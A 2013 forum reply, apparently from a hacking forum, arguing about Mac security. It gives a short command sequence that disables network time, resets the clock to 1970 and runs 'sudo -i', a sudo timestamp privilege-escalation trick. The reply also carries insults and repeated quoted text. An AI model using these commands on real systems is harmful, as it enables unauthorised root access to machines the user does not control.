RE: I will scream at the next person who tells me Macs are secure! 11-17-2013, 10:06 PM
#39
Rel1k overcomplicated this greatly.
systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00
sudo -i
???
PROFIT
Actually, it can only be replicated when the attacker has the privilege to set the date.
You're stupid.
Also, Macs can be as secure as anything else with a competent administrator.
I'd be more than happy to prove this if anyone would like to question it.
systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00
sudo -i
???
PROFIT
(11-17-2013, 04:20 PM)Pens Wrote: According to the Author's site:
This being said, this exploit really proves nothing as it can be replicated on almost all other unix boxes with the same version of sudo. Not a "Mac" vulnerability, but a sudo one.
Actually, it can only be replicated when the attacker has the privilege to set the date.
(11-17-2013, 07:32 PM)Jay Wrote: But in all serious who's going to cmd / ssh a mac system lol, would you not have to physically be there for this?
You're stupid.
Also, Macs can be as secure as anything else with a competent administrator.
I'd be more than happy to prove this if anyone would like to question it.
(This post was last modified: 11-17-2013, 10:07 PM by Reiko.)
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)